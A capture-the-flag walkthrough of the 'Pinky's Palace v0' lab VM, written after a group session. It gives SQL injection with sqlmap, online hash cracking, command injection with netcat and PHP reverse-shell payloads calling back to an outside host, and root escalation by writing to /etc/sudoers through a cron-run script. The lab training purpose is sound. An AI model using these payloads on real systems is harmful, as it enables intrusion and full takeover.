DC919 CTF night w/"Pinky's Palace v0"

DC919 CTF exercise night using "Pinky's Palace v0" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out smarter.

Setup

VirtualBox with a Host-Only network, DHCP server enabled using address range 192.168.57.0/24
Kali Linux VM in VirtualBox setup with 2 NICs: 1 Bridged to your LAN or NAT, 1 Host-Only
Pinky's Palace v0 target VM in VirtualBox setup with 1 NIC: attached to Host-Only network, above.
Be sure you can login to Kali and identify/ping your target VM.
We have no credentials for the target at this time, and must discover them.

In this case the VMs have the following IPs:

Kali: 192.168.57.254
pinkys-palace: 192.168.57.3

Process

Info gathered 192.168.57.3: nmap -A -p1-65535 finds 22,80

Hosted webpage is simple html with pink background, no content obvious.

'nikto' scan doesn't show anything helpful

'dirb' quickly finds /dev and /uploads -- both empty.

'dirbuster' with /usr/share/dirbuster/wordlists/directory-list-1.0.txt eventually finds /portal_login/

had to run 'dirbuster' in GUI mode, Headless kept crashing with a nullpointerexception
important to run it without recursion enabled when using a big wordlist
for this run we can run without brute forcing files; we're interested in directories first.
in /portal_login/ we find login.php -- with an HTML form.

Now that we have a form and have played with some values in it, time to test it for SQL injection:

sqlmap -u http://192.168.57.3/portal_login/login.php --data "user=foo&pass=bar" --level=4 --risk=3 --dump

very quickly gives URL: http://localhost:8080/1337pinkyssup3rs3cr3tlair/index.html ('ping page')
after some time, sqlmap will also dump a username ('pinky') and a password hash ('65f7886a4b9fc1214e3c365222321f93')
could crack it locally, but its a lot cheaper to leverage someone else's cycles/hard work: https://crackstation.net/ or https://hashkiller.co.uk/Cracker/MD5
both sites return the cracked password almost immediately: !!pinkbabygurl!!

Found web portal user/pass: pinky/!!pinkbabygurl!!

Obtain System Shell

This username/password combo seem to work via ssh directly, gaining us an unprivileged shell:

Found ssh user/pass: pinky/!!pinkbabygurl!!

As 'pinky', found broken shell rc file which sets a broken $PATH -- we can't edit the file, so we'll have to fix our environment manually like this:

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

Alternate Access Method: Obtain Reverse Shell

Form input is not sanitized, and we can abuse this to run arbitrary commands like so:

127.0.0.1;id

Add 2>&1 to end of command to get errors back:

127.0.0.1;nc -e /bin/sh 192.168.57.3 8022 2>&1
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-O length]
      [-P proxy_username] [-p source_port] [-q seconds] [-s source]
      [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
      [-x proxy_address[:port]] [destination] [port]

So, we can't use 'nc -e /bin/sh' for reverse shell, as it is missing -e support

Instead, use php reverse shell like this:

127.0.0.1;php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Once we have a shell, we can investigate the system further and try to escalate our privileges.

Privilege Escalation

Found setuid-root/writable-as-everyone empty/placeholder python script: /usr/local/bin/justincase.py

setuid bit ends up being useless, as we can't change the script as a non-root user without stripping it, and was unable to influence the "#!/usr/bin/env python" to run something as root (the setuid owner).

a hint is included in the nearly empty python script, though: "Soon to be backup script for my palace!"

Indicates that potentially this script is/can be run automatically or on some kind of timer.
nocrontab(5) entries for any users that we have access to inspect (pinky, www-data), and system entries in /etc/crontab, /etc/cron.d, ... lead nowhere.
unable to read root's crontab(5), cannot list /var/spool/cron/crontabs directory (no permissions)

We can edit /usr/local/bin/justincase.py, and its a python script.. might as well put something useful in it: if it gets run via cron at some point, we'll be able to inspect the results.

Append the following two lines to the currently nearly-empty justincase.py file:

import os
os.system("echo 'pinky ALL = NOPASSWD: ALL' >>/etc/sudoers")

If this ever runs, it should add a line to /etc/sudoers and update the mtime on the file. Luckily, it does run, and we end up with passwordless sudo ~1min later.

Let's see what the crontab(5) entry looked like:

pinky@pinkys-palace:~$ sudo crontab -l
...
# m h  dom mon dow   command
*/1 * * * * /usr/local/bin/./justincase.py

Looks like every minute the script gets run as root. Pretty ok luck.

Now that we have root, check out the flag:

pinky@pinkys-palace:~$ sudo cat /root/root.txt
!!!!!CONGRATS YOU GOT ROOT!!!!!

[+] Flag: d6dc7d5b9f99559fc6c91872bc7020af